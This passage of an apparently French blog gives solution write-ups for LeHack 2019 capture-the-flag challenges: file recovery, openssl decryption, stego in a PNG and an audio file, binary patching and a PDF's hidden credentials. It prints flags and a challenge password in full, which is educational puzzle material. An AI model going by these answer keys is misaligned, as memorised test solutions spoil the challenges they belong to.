<span class="s1">En revanche, j'</span>ai effacé par erreur le fichier contenant mon plus grand secret <span class="o">(</span>voir s<span class="s1">'il existe des techniques de la mort pour le retrouver mon fichier secret.xz sha256(0fb08681c2f8db4d3c127c4c721018416cc9f9b369d5f5f9cf420b89ee5dfe4e) de 136 octets) et de toute façon, impossible de me rappeler de l'</span>algo utilisé -_- <span class="o">(</span>donc si je le retrouve... il faudra aussi retrouver l<span class="err">'</span>algo pour utiliser ce mot de passe<span class="o">)</span>.
</code></pre></div>
<p>Il nous donne plusieurs informations :</p>
<ul>
<li>Le mot de passe utilisé lors du chiffrement du fichier recherché. On a pas l'algorithme utilisé cependant.</li>
<li>Le nom du fichier à trouver.</li>
</ul>
<div class="highlight"><pre><span></span><code>$ ls .Trash-1000/files -alh
total 201K
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:14 .
drwxrwxrwx <span class="m">1</span> root root <span class="m">0</span> Jul <span class="m">6</span> <span class="m">14</span>:14 ..
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:13 <span class="s2">"CERT-FR – Centre gouvernemental de veille, d'alerte et de réponse aux attaques informatiques_files"</span>
-rwxrwxrwx <span class="m">1</span> root root 33K Jul <span class="m">6</span> <span class="m">14</span>:13 <span class="s2">"CERT-FR – Centre gouvernemental de veille, d'alerte et de réponse aux attaques informatiques.html"</span>
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 — Wikipédia_files'</span>
-rwxrwxrwx <span class="m">1</span> root root 151K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 — Wikipédia.html'</span>
-rwxrwxrwx <span class="m">1</span> root root <span class="m">136</span> Jul <span class="m">6</span> <span class="m">14</span>:09 secret.xz
</code></pre></div>
<p>On peut vérifier le hash du fichier avec celui indiqué dans le message :</p>
<div class="highlight"><pre><span></span><code>$ sha256sum .Trash-1000/files/secret.xz
0fb08681c2f8db4d3c127c4c721018416cc9f9b369d5f5f9cf420b89ee5dfe4e .Trash-1000/files/secret.xz
</code></pre></div>
<p>On a donc bien notre fichier. On le copie et on en extrait le contenu :</p>
<div class="highlight"><pre><span></span><code>$ xz -d secret.xz
$ cat secret
Salted__��k��.�@���>�#��z���
�S�n���!��O�ND�5����k�b<span class="o">=</span>��N-�㖿�,��s�٪#
</code></pre></div>
<p>Le message est bien encodé et salé. Il est possible de tester tout les algorithmes proposés par la commande <code>openssl</code> à la main, mais cela risque de prendre du temps. On peut donc utiliser des scripts qui les testent pour nous :</p>
<div class="highlight"><pre><span></span><code><span class="c1"># git clone https://github.com/penthium2/salt_pepper.git .</span>
$ ./salt_pepper/salt-pepper -f secret -p <span class="s2">"vgrohhfyek0wkfi5fv13anexapy3sso6"</span>
$ cat FLAGS/*
flag : lh_6c31ba64e522b5f9326b7bee0abef6547f60d214
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>Et voilà :). On a bien notre flag qui s'affiche : <code>lh_6c31ba64e522b5f9326b7bee0abef6547f60d214</code>. Le chiffrement utilisé est </p>LeHack 19 - #ECSC StegCryptoDIY #12019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-ecsc-stegcryptodiy-1.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/leHACK19_chall.png">leHACK19_chall.png</a></em></p>
<div class="highlight"><pre><span></span><code>#ECSC StegCryptoDIY #1
30 Points
Comme tout le monde s'en rappelle Dumb et Dumby ont échangé, il y a quelques semaines, en utilisant un nouveau cryptosystème basé sur les problèmes FACT et DLP : CryptoDIY lors des qualifications de l'ECSC. Sauf qu'ils ont visiblement changé …</code></pre></div><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/leHACK19_chall.png">leHACK19_chall.png</a></em></p>
<div class="highlight"><pre><span></span><code>#ECSC StegCryptoDIY #1
30 Points
Comme tout le monde s'en rappelle Dumb et Dumby ont échangé, il y a quelques semaines, en utilisant un nouveau cryptosystème basé sur les problèmes FACT et DLP : CryptoDIY lors des qualifications de l'ECSC. Sauf qu'ils ont visiblement changé leur système!
Apparemment les paramètres crypto sont cachés dans ce fichier, à vous de les trouver.
Url: https://static.wargame.rocks/leHACK19_chall.png
</code></pre></div>
<p>Comme souvent, la commande <code>strings</code> peut facilement nous aiguiller. On obtient dans notre cas ici :</p>
<div class="highlight"><pre><span></span><code>$ strings leHACK19_chall.png
IHDR
IDATx
<span class="nv">H4PB</span><span class="o">=</span>
0C<@
<span class="o">[</span>...<span class="o">]</span>
-*36,
gKyv
@duMBTiA9IDExNzU1MDY4OTQ0MTQyOTY5NDk4NzQzMjQ1OTg0NzYxMTgxMzI1NjA1MzA0NjI1Mjg2OTU4NzIxMzkxNzY2MDkxMjgzMTMyMzk4NDM3NjQ1MDM4MzQ5Nzc1ODk4OTIzNDY1MzMxMjYwMzA4MDY0NjExMTY3OTI2MTg3Mzk5Mzg0NzIzMzYwOTQxODgzNzMyMTc0OTAxNjY2ODAzICxnMSA9IDM4MDg4MTk1MDU1NjQ5OTk1NDUyNTI2MjM2MzExOTI1MDMyMTIxODY1OTgwODg1NTUzNDM3MzgxMTExNjUzODI2MjM0MjE3MjAxMTk4Mzc1NDQ2NTgxNzM4MjI0NjE4MzQwNzYzNDc3OTUxNTkzNjY1OTMxNzc2NjkwNTg3MDUwODcyNjY4OTg0NDQ4MTg5MjY2Njg1ODQ1MTksIGcyID0gODcyMTc4NzQwMDMyNzc4Mzc0ODAxNDg0OTAzNzYyNjAzOTM5NzgwNzYxMjM3MjgwNDAxNjY0MzY1MzA0NzU3NTk3NjAwOTgyNzAwMzQ0Nzc3ODg2MTI2MjAzNjc1MjMyNjgyNzYxMzA3ODM0NjIyNTE5MjU4MTcwODI0MDgyMDMyNTg2NzY1ODc0MjA3ODY5NDQ0NTY3Nzg3NyBJIHVzZSB0aGlzIGZ1bmN0b25zIGZvciBlbmNpcGhlcmluZyBvdXIgc2tleSA6IGVuY2lwaGVyKGludC5mcm9tX2J5dGVzKHNrZXksJ2JpZycpLGcxLGcyLE4pIHdpdGggZGVmIGVuY2lwaGVyKG0sZzEsZzIsTik6IHMxPXJhbmRvbS5yYW5kcmFuZ2UoMioqMTI3LDIqKjEyOCkgczI9cmFuZG9tLnJhbmRyYW5nZSgyKioxMjcsMioqMTI4KSByZXR1cm4gKG0qcG93KGcxLHMxLE4pKSVOLCAobSpwb3coZzIsczIsTikpJU4gYW5kIGhlcmUgaXMgYSBmbGFnOiBsZWhhY2syMDE5e2FlZjk1NTZhNTc1Y2M5ZGU4ZmM5NjA5YmQwMzRkNjNmZTBhMDE0NzBlYjQwMTM3ODI1M2Y3MjNiYmM1Y2MxNmN9
IEND
</code></pre></div>
<p>On remarque notamment l'avant dernière ligne. Elle représente une chaîne de caractères encode en base64. Cependant, il faut supprimer le caractère <code>@</code> qui ne fait pas parti de cette encodage :</p>
<div class="highlight"><pre><span></span><code>$ strings leHACK19_chall.png <span class="p">|</span> grep <span class="s1">'@du'</span> <span class="p">|</span> sed <span class="s1">'s/@//'</span> <span class="p">|</span> base64 -d
v�N <span class="o">=</span> <span class="m">11755068944142969498743245984761181325605304625286958721391766091283132398437645038349775898923465331260308064611167926187399384723360941883732174901666803</span> ,g1 <span class="o">=</span> <span class="m">3808819505564999545252623631192503212186598088555343738111165382623421720119837544658173822461834076347795159366593177669058705087266898444818926668584519</span>, <span class="nv">g2</span> <span class="o">=</span> <span class="m">8721787400327783748014849037626039397807612372804016643653047575976009827003447778861262036752326827613078346225192581708240820325867658742078694445677877</span> I use this functons <span class="k">for</span> enciphering our skey : encipher<span class="o">(</span>int.from_bytes<span class="o">(</span>skey,<span class="s1">'big'</span><span class="o">)</span>,g1,g2,N<span class="o">)</span> with def encipher<span class="o">(</span>m,g1,g2,N<span class="o">)</span>: <span class="nv">s1</span><span class="o">=</span>random.randrange<span class="o">(</span><span class="m">2</span>**127,2**128<span class="o">)</span> <span class="nv">s2</span><span class="o">=</span>random.randrange<span class="o">(</span><span class="m">2</span>**127,2**128<span class="o">)</span> <span class="k">return</span> <span class="o">(</span>m*pow<span class="o">(</span>g1,s1,N<span class="o">))</span>%N, <span class="o">(</span>m*pow<span class="o">(</span>g2,s2,N<span class="o">))</span>%N and here is a flag: lehack2019<span class="o">{</span>aef9556a575cc9de8fc9609bd034d63fe0a01470eb401378253f723bbc5cc16c<span class="o">}</span>
</code></pre></div>
<p>On obtient alors ce qui semble être du code (ce qui nous servira par la suite ;) ) ainsi que notre flag : <code>lehack2019{aef9556a575cc9de8fc9609bd034d63fe0a01470eb401378253f723bbc5cc16c}</code>.</p>LeHack 19 - Gladiator2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-gladiator.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/gladiator">gladiator</a></em></p>
<p>Ce challenge se présente sous un binaire. Il propose un jeu de combat :</p>
<div class="highlight"><pre><span></span><code>Welcome Gladiator !
Please select a character :
1 - Berserker (attack : 20, shield: 5)
2 - Guardian (attack: 10, shield: 10)
</code></pre></div>
<p>On teste donc le jeu plusieurs fois mais sans succès. On peut gagner, perdre ou faire égaliter …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/gladiator">gladiator</a></em></p>
<p>Ce challenge se présente sous un binaire. Il propose un jeu de combat :</p>
<div class="highlight"><pre><span></span><code>Welcome Gladiator !
Please select a character :
1 - Berserker (attack : 20, shield: 5)
2 - Guardian (attack: 10, shield: 10)
</code></pre></div>
<p>On teste donc le jeu plusieurs fois mais sans succès. On peut gagner, perdre ou faire égaliter, le flag refuse de s'afficher.</p>
<p>On commence donc notre analyse avec IDA. On peut donc voir des fonctions avec pour nom une simple lettre. On commence notre analyse par là. On peut générer du pseudo-code pour chacune d'elle afin de rendre plus facile la compréhension.</p>
<p>En arrivant à la fonction <code>X</code>, on remarque dans le pseudo-code qu'elle ressemble beaucoup à la structure du <code>Berserker</code> :</p>
<p><img alt="glad_fonction_asm" src="https://blog.nlegall.fr/images/glad_fonction_asm.png"></p>
<div class="highlight"><pre><span></span><code><span class="n">P_0</span> <span class="o">*</span><span class="kr">__cdecl</span> <span class="nf">b</span><span class="p">(</span><span class="n">P_0</span> <span class="o">*</span><span class="n">retstr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">string_0</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ax</span>
<span class="n">byte</span> <span class="o">*</span><span class="n">v2</span><span class="p">;</span> <span class="c1">// r12</span>
<span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// r13</span>
<span class="n">string_0</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// ax</span>
<span class="n">v1</span> <span class="o">=</span> <span class="n">tos2</span><span class="p">(</span><span class="s">"a"</span><span class="p">);</span>
<span class="n">v2</span> <span class="o">=</span> <span class="n">v1</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="n">v3</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v1</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="n">v4</span> <span class="o">=</span> <span class="n">tos2</span><span class="p">(</span><span class="o">&</span><span class="n">byte_A01E</span><span class="p">);</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">l</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">s</span> <span class="o">=</span> <span class="mi">20</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">sh</span> <span class="o">=</span> <span class="mi">5</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">st</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">a</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v2</span><span class="p">;</span>
<span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">retstr</span><span class="o">-></span><span class="n">a</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">la</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v4</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">retstr</span><span class="o">-></span><span class="n">la</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v4</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="k">return</span> <span class="n">retstr</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>On modifie alors une valeur, par exemple l'attaque, pour valider cette hypothèse :</p>
<p><img alt="glad_attack_hex" src="https://blog.nlegall.fr/images/glad_attack_hex.png"></p>
<p><img alt="glad_attack_hex_new" src="https://blog.nlegall.fr/images/glad_attack_hex_new.png"></p>
<p>On applique le patch, et on relance notre binaire :</p>
<div class="highlight"><pre><span></span><code>Welcome Gladiator !
Please select a character :
1 - Berserker (attack : 20, shield: 5)
2 - Guardian (attack: 10, shield: 10)
1
VS Berserker
Select action in the range 0..3 :
Attack = 0
Protect = 1
Heal = 2
Pass = 3
0
Turn 1 :
User Action : attack
Bot Action : heal
User: Life : 100, Stamina: 9
Bot Life : -120, Stamina: 9
You Win !
</code></pre></div>
<p>Parfait, on a trouvé le code pour le <code>Berserker</code>. Cependant, on ne sait toujours pas comment débloquer le flag. On avance donc dans notre recherche de fonctions. On arrive à la fonction <code>d</code> :</p>
<div class="highlight"><pre><span></span><code> <span class="k">if</span> <span class="p">(</span> <span class="n">p</span><span class="p">.</span><span class="n">l</span> <span class="o">==</span> <span class="mi">42</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">c_array</span> <span class="o">=</span> <span class="mi">4330</span><span class="p">;</span>
<span class="n">v6</span> <span class="o">=</span> <span class="mi">934</span><span class="p">;</span>
<span class="n">v7</span> <span class="o">=</span> <span class="mi">2330</span><span class="p">;</span>
<span class="n">v8</span> <span class="o">=</span> <span class="mi">1502</span><span class="p">;</span>
<span class="n">v9</span> <span class="o">=</span> <span class="mi">4506</span><span class="p">;</span>
<span class="n">v10</span> <span class="o">=</span> <span class="mi">7604</span><span class="p">;</span>
<span class="n">v11</span> <span class="o">=</span> <span class="mi">2746</span><span class="p">;</span>
<span class="n">v12</span> <span class="o">=</span> <span class="mi">6248</span><span class="p">;</span>
<span class="n">v13</span> <span class="o">=</span> <span class="mi">3353</span><span class="p">;</span>
<span class="n">v14</span> <span class="o">=</span> <span class="mi">4068</span><span class="p">;</span>
<span class="n">v15</span> <span class="o">=</span> <span class="mi">968</span><span class="p">;</span>
<span class="n">v16</span> <span class="o">=</span> <span class="mi">5295</span><span class="p">;</span>
<span class="n">v17</span> <span class="o">=</span> <span class="mi">1207</span><span class="p">;</span>
<span class="n">v18</span> <span class="o">=</span> <span class="mi">4878</span><span class="p">;</span>
<span class="n">v19</span> <span class="o">=</span> <span class="mi">2696</span><span class="p">;</span>
<span class="n">v20</span> <span class="o">=</span> <span class="mi">7067</span><span class="p">;</span>
<span class="n">v21</span> <span class="o">=</span> <span class="mi">2954</span><span class="p">;</span>
<span class="n">v22</span> <span class="o">=</span> <span class="mi">6149</span><span class="p">;</span>
<span class="n">v23</span> <span class="o">=</span> <span class="mi">3199</span><span class="p">;</span>
<span class="n">new_array_from_c_array</span><span class="p">(</span><span class="o">&</span><span class="n">tmp3</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="o">&</span><span class="n">c_array</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">tmp4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">tmp3</span><span class="p">.</span><span class="n">len</span> <span class="o">></span> <span class="n">tmp4</span><span class="p">;</span> <span class="o">++</span><span class="n">tmp4</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">i</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">tmp3</span><span class="p">.</span><span class="n">data</span> <span class="o">+</span> <span class="n">tmp4</span><span class="p">);</span>
<span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v1</span><span class="p">.</span><span class="n">element_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">main</span><span class="p">.</span><span class="n">element_size</span><span class="p">;</span>
<span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v1</span><span class="p">.</span><span class="n">data</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">main</span><span class="p">.</span><span class="n">data</span><span class="p">;</span>
<span class="n">j</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">array__get</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
<span class="n">v2</span> <span class="o">=</span> <span class="n">char_str</span><span class="p">(</span><span class="n">j</span><span class="p">);</span>
<span class="n">v27</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v2</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="n">v27</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="n">v2</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="n">v_print</span><span class="p">(</span><span class="n">v27</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">v3</span> <span class="o">=</span> <span class="n">tos2</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">v28</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v3</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="n">v28</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="n">v3</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="n">v_print</span><span class="p">(</span><span class="n">v28</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>On voit qu'un test est fait avant d'exécuter le code de la fonction. Comme vu dans la fonction du <code>Berserker</code>, le <code>p.l</code> correspond au point de vie du joueur. On retourne donc éditer la valeur par défaut (<code>100</code>) afin de mettre le <code>42</code> testé dans cette fonction.</p>
<p><img alt="glad_life_hex_new" src="https://blog.nlegall.fr/images/glad_life_hex_new.png"></p>
<p>On applique notre nouveau patch et on relance une nouvelle fois le binaire :</p>
<div class="highlight"><pre><span></span><code><span class="err">Welcome Gladiator !</span>
<span class="err">Please select a character :</span>
<span class="err"> 1 - Berserker (attack : 20, shield: 5)</span>
<span class="err"> 2 - Guardian (attack: 10, shield: 10)</span>
<span class="err">1</span>
<span class="err">VS Guard</span>
<span class="err">Select action in the range 0..3 :</span>
<span class="err"> Attack = 0</span>
<span class="err"> Protect = 1</span>
<span class="err"> Heal = 2</span>
<span class="err"> Pass = 3</span>
<span class="err">0</span>
<span class="err">Turn 1 :</span>
<span class="err"> User Action : attack</span>
<span class="err"> Bot Action : heal</span>
<span class="err"> User: Life : 42, Stamina: 9</span>
<span class="err"> Bot Life : -115, Stamina: 9</span>
<span class="err">You Win !</span>
<span class="err">LH{lUj?]T_VAR94$+N}</span>
</code></pre></div>
<p>YEAH ! Le flag apparaît alors après avoir tué l'adversaire : <code>LH{lUj?]T_VAR94$+N}</code>.</p>LeHack 19 - HackHackLeHack2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-hackhacklehack.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/HackHackLeHack.flac">HackHackLeHack.flac</a></em></p>
<div class="highlight"><pre><span></span><code>HackHackLeHack
200 Points - Hard
HackHackLeHack
Url: https://static.wargame.rocks/HackHackLeHack.flac
</code></pre></div>
<p>Afin de rendre le traitement plus facile, on commence par la conversion en mp3.</p>
<p>On l'écoutant, on remarque que le son est différent entre la gauche et la droite.</p>
<h2>Gauche</h2>
<p>On sépare les deux et …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/HackHackLeHack.flac">HackHackLeHack.flac</a></em></p>
<div class="highlight"><pre><span></span><code>HackHackLeHack
200 Points - Hard
HackHackLeHack
Url: https://static.wargame.rocks/HackHackLeHack.flac
</code></pre></div>
<p>Afin de rendre le traitement plus facile, on commence par la conversion en mp3.</p>
<p>On l'écoutant, on remarque que le son est différent entre la gauche et la droite.</p>
<h2>Gauche</h2>
<p>On sépare les deux et on commence par écouter la gauche : <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Gauche only.mp3">Gauche</a>.</p>
<p><img alt="Transform1" src="https://blog.nlegall.fr/images/Transform1.png"></p>
<p>Il faut alors reporter les <code>0</code> et <code>1</code> qui sont donnés dans la piste audio. On obtiens :</p>
<div class="highlight"><pre><span></span><code>0010111101101000001100110100110001001100001100000101111101100011001100010101000001101000001100110101001000100101
</code></pre></div>
<p>On la décode facilement depuis le terminal en utilisant <code>perl</code>:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"0010111101101000001100110100110001001100001100000101111101100011001100010101000001101000001100110101001000100101"</span> <span class="p">|</span> perl -lpe <span class="s1">'$_=pack"B*",$_'</span>
/h3LL0_c1Ph3R%
</code></pre></div>
<p>On a une première chaîne de caractère. Mais c'est pas le flag :(. On poursuit alors avec la piste droite.</p>
<h2>Droite</h2>
<p>De base, on obtient ce rendu : <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only.mp3">Droite</a>.</p>
<p>On remarque alors que deux mots se répètent sur la durée de la piste : <code>le</code> et <code>hack</code>. On peut donc supposer que cela correspond à un code binaire :</p>
<ul>
<li><code>le</code> pour <code>0</code></li>
<li><code>hack</code> pour <code>1</code></li>
</ul>
<p>La vitesse étant trop rapide pour suivre le rythme, on ralenti la piste : <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only slow.mp3">Droite ralentie</a>. Des fréquences parasites apparaissent, on peut donc également les éliminer et isoler les fréquences correspondantes aux mots qui nous intéressent : <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only slow + EQ.mp3">Droite ralentie EQ</a>.</p>
<p>L'ensemble est beaucoup plus facile de compréhension. Cependant, au vu de la durée de la piste, un découpage par octet permet de séparer et vérifier plus facilement la chaîne binaire reportée : <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only slow + EQ + cut.mp3">Droite ralentie EQ coupée</a>. Le résultat est une piste d'une durée de 8:55 min.</p>
<p><img alt="Transform2" src="https://blog.nlegall.fr/images/Transform2.png"></p>
<p>Après de très nombreuses écoutes et vérifications, on obtiens ainsi la chaîne binaire suivante. On peut la décoder comme fait précédemment :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"01010011011000010110110001110100011001010110010001011111010111111110011011110110110100010111100101111101010110001000001110001110110101111000110111110010010010100000010000010000100101001100001111111110011111011101101111100110000000101110000010100010101011101000001101100010111001000000011110111101110001111001111100010110000010011011101010001011100010000110010111011110100110000011011101001100011011101000101110001000011011001000000100011001111100000100110011110001100100100100111011110101001010111100000110011001"</span><span class="p">|</span> perl -lpe <span class="s1">'$_=pack"B*",$_'</span>
Salted__���y<span class="o">}</span>X���J���<span class="o">}</span>��ࢮ�b��ǟ ���eޘ7Ln��l��L�N�+��
</code></pre></div>
<p>Une recherche sur le début de la chaîne de caractéres décodées nous indique que l'ensemble correspond au résultat d'un chiffrement avec un salt. On peut donc supposé que la première partie du fichier audio donne le salt correspondant au chiffrement.</p>
<p>On essaye donc de décoder avec <code>openssl</code> en précisant le salt via l'option <code>-k (password to use)</code> :</p>
<div class="highlight"><pre><span></span><code><span class="c1"># les erreurs sont renvoyées vers /dev/null pour être sur d'affiché que le flag</span>
$ <span class="nb">echo</span> <span class="s2">"01010011011000010110110001110100011001010110010001011111010111111110011011110110110100010111100101111101010110001000001110001110110101111000110111110010010010100000010000010000100101001100001111111110011111011101101111100110000000101110000010100010101011101000001101100010111001000000011110111101110001111001111100010110000010011011101010001011100010000110010111011110100110000011011101001100011011101000101110001000011011001000000100011001111100000100110011110001100100100100111011110101001010111100000110011001"</span><span class="p">|</span> perl -lpe <span class="s1">'$_=pack"B*",$_'</span><span class="p">|</span> openssl aes-256-cbc -salt -d -k <span class="s2">"/h3LL0_c1Ph3R%"</span> <span class="m">2</span>>/dev/null
flag: lh_1bd534f7046f509e2921a2dce3455a35
</code></pre></div>
<p>On a donc notre flag :D.</p>LeHack 19 - infiltrez la mafia!2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-infiltrez-la-mafia.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/Mafia_cybersecrète.pdf">Mafia_cybersecrète.pdf</a></em></p>
<div class="highlight"><pre><span></span><code>infiltrez la mafia!
5 Points
Vous faites partie d'un groupe de hackers qui cherche à démanteler un groupe nommé "Mafia cybersecrète". Il est en effet hors de question de les laisser agir à leur guise! Parmi les documents que vous avez pu récupérés à propos de …</code></pre></div><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/Mafia_cybersecrète.pdf">Mafia_cybersecrète.pdf</a></em></p>
<div class="highlight"><pre><span></span><code>infiltrez la mafia!
5 Points
Vous faites partie d'un groupe de hackers qui cherche à démanteler un groupe nommé "Mafia cybersecrète". Il est en effet hors de question de les laisser agir à leur guise! Parmi les documents que vous avez pu récupérés à propos de ce groupe, vous disposez du document ci-joint. Saurez-vous retrouver le mot de passe de l'utilisateur?
Url: https://static.wargame.rocks/Mafia_cybersecrète.pdf
</code></pre></div>
<p>Le PDF possède une partie écrite en noir sur fond noir (permet de masquer visuelement seulement). Le simple double-clic sur les zones ainsi "effacées" permet de copier/coller l'identifiant et le mot de passe du challange :</p>
<div class="highlight"><pre><span></span><code><span class="err">JMenin87</span>
<span class="err">CyberSecretJMenin</span>
</code></pre></div>LeHack 19 - my first crackme2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-my-first-crackme.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/checkme.py">checkme.py</a></em></p>
<div class="highlight"><pre><span></span><code>my first crackme
5 Points
Tu dois trouver le mot de passe qui valide le script python!
Url: https://static.wargame.rocks/checkme.py
</code></pre></div>
<p>On a un seul fichier qui est un script Python. On l'ouvre donc avec notre éditeur de texte préféré (vim for ever <3 …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/checkme.py">checkme.py</a></em></p>
<div class="highlight"><pre><span></span><code>my first crackme
5 Points
Tu dois trouver le mot de passe qui valide le script python!
Url: https://static.wargame.rocks/checkme.py
</code></pre></div>
<p>On a un seul fichier qui est un script Python. On l'ouvre donc avec notre éditeur de texte préféré (vim for ever <3) :</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s1">'repuS'</span><span class="p">[::(</span><span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="mi">88</span> <span class="o">+</span> <span class="mi">87</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">183</span> <span class="o">+</span> <span class="mi">80</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">125</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)]</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">161</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">140</span> <span class="o">+</span> <span class="mi">76</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">72</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="o">-</span><span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">53</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">5</span> <span class="o">*</span> <span class="mi">44</span> <span class="o">+</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">141</span> <span class="o">+</span> <span class="mi">101</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">153</span> <span class="o">+</span> <span class="mi">14</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">152</span> <span class="o">+</span> <span class="mi">4</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">94</span> <span class="o">+</span> 